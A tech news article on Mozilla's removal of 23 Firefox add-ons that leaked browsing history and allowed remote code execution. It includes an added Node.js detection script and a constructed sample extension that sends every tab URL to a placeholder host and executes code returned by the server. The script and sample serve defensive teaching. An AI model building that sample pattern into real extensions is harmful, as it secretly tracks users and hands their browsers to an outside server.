Mozilla has removed 23 Firefox add-ons that snooped on users and sent data to remote servers, a Mozilla engineer told Bleeping Computer today.
The list of blocked add-ons includes "Web Security," a security-centric Firefox add-on with over 220,000 users, which was at the center of a controversy this week after it was caught sending users' browsing histories to a server located in Germany.
"The mentioned add-on has been taken down, together with others, after I conducted a thorough audit of [the] add-ons," Rob Wu, a Mozilla Browser Engineer and add-on reviewer, told Bleeping Computer via email.
"These add-ons are no longer available at AMO and [have been] disabled in the browsers of users who installed them," Wu said.
"I did the investigation voluntarily last weekend after spotting Raymond Hill's (gorhill) comment on Reddit," Wu told us. "I audited the source code of the extension, using tools including my extension source viewer."
"After getting a good view of the extension's functionality, I used webextaware to retrieve all publicly available Firefox add-ons from addons.mozilla.org (AMO) and looked for similar patterns. Through this method, I found twenty add-ons that I subjected to an additional review, which can be put in two evenly sized groups based on their characteristics.
"The first group is similar to the Web Security add-on. At installation time, a request is sent to a remote server to fetch the URL of another server. Whenever a user navigates to a different location, the URL of the tab is sent to this remote server. This is not just a fire-and-forget request; responses in a specific format can activate remote code execution (RCE) functionality," Wu said. "Fortunately, the extension authors made an implementation mistake in 7 out of 10 extensions (including Web Security), which prevents RCE from working."
"The second group does not collect tab URLs in the same way as the first group, but it is able to execute remote code (which has a worse effect). This second group seems like an evolved version of the first group, because the same logic was used for RCE, with more obfuscation than the other group.
"All of these extensions used subtle code obfuscation, where actual legitimate extension functionality is mixed with seemingly innocent code, spread over multiple locations and files. The sheer number of misleading identifiers, obfuscated URLs / constants, and covert data flows left me with little doubt about the intentions of the author: It is apparent that they tried to hide malicious code in their add-on."
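As an added illustration (not code from the original article, from Mozilla, or from the add-ons themselves), the following Node.js script sketches the kind of pattern search Wu describes across a corpus of extension sources: a static triage pass that flags the install-time bootstrap request, the per-navigation URL report, the eval-style sink that a response in the right format can reach, and the string obfuscation. The `analyzeExtensionSource` function, its signal table, and both sample sources are constructed for this example; the suspicious sample only models the flow quoted above, is not the real add-ons' code, and uses a placeholder hostname.

```javascript
// Added example: heuristic static triage of WebExtension source for the
// exfiltration + remote-code pattern described above. Names, regexes and the
// two embedded samples are this example's own assumptions.

const SIGNALS = {
  // A listener that fires on every navigation is what makes per-URL reporting possible.
  navigationHook: /\b(?:tabs\.onUpdated|tabs\.onActivated|webNavigation\.on(?:Committed|Completed|BeforeNavigate))\b/,
  // Reading the URL of the tab or navigation event.
  tabUrlAccess: /\b(?:tab|details|changeInfo|info)\.url\b/,
  // Anything that can carry data off the machine.
  outboundRequest: /\b(?:fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon\s*\()/,
  // The reporting endpoint is learned at install time instead of being hardcoded.
  installTimeBootstrap: /runtime\.onInstalled\.addListener/,
  // Dynamic-code sinks; a network response reaching one is RCE in the extension's context.
  dynamicCode: /\b(?:eval\s*\(|new\s+Function\s*\(|setTimeout\s*\(\s*["'`])/,
  // Low-effort string hiding: runs of hex escapes, char-code assembly, base64 decoding.
  obfuscation: /(?:\\x[0-9a-fA-F]{2}){4,}|String\.fromCharCode|atob\s*\(|unescape\s*\(/,
};

// Returns which signals fired, the combined findings, and a triage verdict.
function analyzeExtensionSource(source) {
  const hits = {};
  for (const [name, re] of Object.entries(SIGNALS)) hits[name] = re.test(source);

  const findings = [];
  if (hits.navigationHook && hits.tabUrlAccess && hits.outboundRequest) {
    findings.push("browsing-history exfiltration: navigation listener sends tab URLs to a remote host");
  }
  if (hits.outboundRequest && hits.dynamicCode) {
    findings.push("remote code execution: a network response can reach an eval-style sink");
  }
  if (hits.installTimeBootstrap && hits.outboundRequest) {
    findings.push("install-time bootstrap: endpoint fetched from a server rather than hardcoded");
  }
  if (hits.obfuscation) {
    findings.push("string obfuscation: hex escapes / char-code assembly / base64 decoding");
  }
  const verdict = findings.length >= 2 ? "review-manually" : findings.length === 1 ? "suspicious" : "clean";
  return { hits, findings, verdict };
}

// Constructed sample modelled on the three-step flow quoted above (placeholder host).
const SUSPICIOUS_SAMPLE = String.raw`
const h = "\x68\x74\x74\x70\x73\x3a\x2f\x2f" + "bootstrap.example.invalid/cfg";
let sink = null;
browser.runtime.onInstalled.addListener(async () => {
  sink = await (await fetch(h)).text();                          // step 1: learn where to report
});
browser.tabs.onUpdated.addListener(async (id, info, tab) => {
  if (!sink || !info.url) return;
  const r = await fetch(sink, { method: "POST", body: tab.url }); // step 2: report every URL
  const j = await r.json();
  if (j && j.k === "run") new Function(j.c)();                   // step 3: formatted reply -> RCE
});
`;

// Constructed benign sample: also watches navigations, but nothing leaves the machine.
const BENIGN_SAMPLE = String.raw`
const counts = {};
browser.tabs.onUpdated.addListener((id, info, tab) => {
  if (info.status !== "complete") return;
  const host = new URL(tab.url).hostname;
  counts[host] = (counts[host] || 0) + 1;
  browser.storage.local.set({ counts });
});
`;

for (const [label, src] of [["suspicious", SUSPICIOUS_SAMPLE], ["benign", BENIGN_SAMPLE]]) {
  const result = analyzeExtensionSource(src);
  console.log(label, "->", result.verdict, result.findings);
}
```

These are triage heuristics, not proof: an extension that legitimately downloads a configuration file on install will trip the bootstrap rule, and a navigation listener that reads `tab.url` is common in benign add-ons. A hit is a reason to read the code by hand, which is what the quoted audit did.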
Wu reported these issues to fellow Mozilla engineers, who not only removed the add-ons from the Mozilla website, but also disabled them inside users' browsers.
"Although I could have taken down the extensions myself (as an add-on reviewer at AMO), I did not do so, because just taking down the listings would prevent new installations, but still leave a few hundred thousand users vulnerable to an extension from a shady developer," Wu told Bleeping Computer via email.
A bug report includes the list of all add-ons removed today in Mozilla's purge. The bug report lists the add-ons by their IDs, and not by their names, although Wu provided Bleeping Computer with the names of some add-ons.
Besides Web Security, other banned add-ons include Browser Security, Browser Privacy, and Browser Safety. All of these have been observed sending data to the same server as Web Security, located at 220.127.116.11.
The other banned add-ons include:
All in all, over 500,000 users had one of these add-ons installed inside Firefox.
In a quick test, Bleeping Computer confirmed that, true to its word, Mozilla has indeed disabled the Web Security add-on in the Firefox instance we used for tests yesterday. Users of any of the banned add-ons will see a warning like this:
The warning message displayed at the top redirects users to this page, where it provides the following explanation for the ban:
In the bug report, another Mozilla engineer gave additional explanations, consistent with Wu's investigation:
Article updated with the names of other banned add-ons and additional investigation details provided by Wu.